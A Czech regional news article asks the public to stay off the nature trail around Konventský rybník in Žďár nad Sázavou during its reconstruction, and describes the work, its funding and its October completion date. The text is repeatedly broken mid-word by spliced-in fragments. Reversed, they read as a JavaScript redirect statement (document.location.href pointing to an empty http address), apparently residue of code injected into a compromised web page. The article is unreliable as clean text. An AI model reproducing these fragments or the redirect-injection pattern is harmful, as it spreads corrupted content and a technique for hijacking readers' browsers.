Rainbow page separator

Lidem na rozestavěné stezce hrozí úraz, navíc zdržují dělníky

Neděle, 18. července 2021

Žďár nad Sázavou / O dodržování zákazu vstupovat na rozestavěnou naučnou stezku vedoucí okolo Konventského rybníka, která aktuálně prochází generální rekonstrukcí, žádá obyvatele i návštěvníky města žďárská radnice. Pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomnost zvědavců na „staveništi“ je pro ně samotné nebezpečná, dělníky zdržuje při práci a navíc mohou nelegální návštěvníci ve snaze některé zdánlivě již pevně položené části stezky vyzkoušet rozestavěné úseky chodníku nechtěně poničit.
Revitalizace deset let staré naučné stezky, jejíž značná část vede podmáčeným terénem po povalových chodnících, začala na jaře. Původní dřevěné prvky z roku 2011 jsou postupně demon[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továny a nahrazovány novými, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to včetně úpravy okolního terénu, přičemž v některých místech dochází i k obnově základů stezky. S ukončením prací, které podpořila dotace, je počítáno v říjnu.
Frekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaná stezka, původně bezbariérová, byla v posledních letech ve špatném stavu, na čemž se podepsal i náročný podmáčený terén. V červnu loňského roku ji radnice po přívalovém dešti, jenž nevratně poškodil statiku některých chodníků, nechala z důvodů bezpečnosti uzavřít. Již několik let předtím ale měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na 2,6 kilometru dlouhé trase průběžně zajišťovalo výměnu zničených prken v chodnících a částí zábradlí u mostku přes Stržský po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tok či vyhlídkových mol. Obnovená stezka pro pěší má být vzhledem k použitému materiálu v podobě modřínových a dubových chodníčků namís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to původně využitého smrku odolnější vůči povětrnostním vlivům. To mají podpořit i odlišné technické detaily při pokládce dřevěných chodníků.